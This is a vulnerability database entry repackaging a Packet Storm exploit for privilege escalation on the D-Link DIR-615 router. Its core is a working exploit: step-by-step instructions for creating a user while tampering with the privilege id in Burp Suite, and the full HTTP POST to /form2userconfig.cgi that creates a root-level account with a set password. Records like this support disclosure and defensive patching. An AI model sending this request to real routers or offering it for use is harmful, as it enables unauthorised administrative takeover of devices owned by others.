ID

VAR-E-201912-0125


TITLE

D-Link DIR-615 Privilege Escalation

Trust: 0.5

sources: PACKETSTORM: 155668

DESCRIPTION

D-Link DIR-615 suffers from a privilege escalation vulnerability.

Trust: 0.5

sources: PACKETSTORM: 155668

AFFECTED PRODUCTS

vendor:d linkmodel:dir-615scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 155668

EXPLOIT

# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: N/A

# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account with a name(i.e ptguy) and change the privileges from user to root(admin)
# by changing privileges id (1 to 2) with burp suite.

# Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# Now log in with newly created root (ptguy) user. You have all administrator rights.

Trust: 0.5

sources: PACKETSTORM: 155668

EXPLOIT HASH

LOCAL

SOURCE

md5: 493e75de8e7ec25a2de010cb3530fb22
sha-1: ebb8bb690e0e33a13edb41d069d1cf5d1aa11705
sha-256: 739965ed2e744b1a6d47c2b150242ff9854e69b0c3fd7984ca0db09f32514028
md5: 493e75de8e7ec25a2de010cb3530fb22

Trust: 0.5

sources: PACKETSTORM: 155668

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 155668

TAGS

tag:exploit

Trust: 0.5

sources: PACKETSTORM: 155668

CREDITS

Sanyam Chawla

Trust: 0.5

sources: PACKETSTORM: 155668

EXTERNAL IDS

db:PACKETSTORMid:155668

Trust: 0.5

sources: PACKETSTORM: 155668

SOURCES

db:PACKETSTORMid:155668

LAST UPDATE DATE

2022-07-27T09:18:10.581000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:155668date:2019-12-16T15:38:53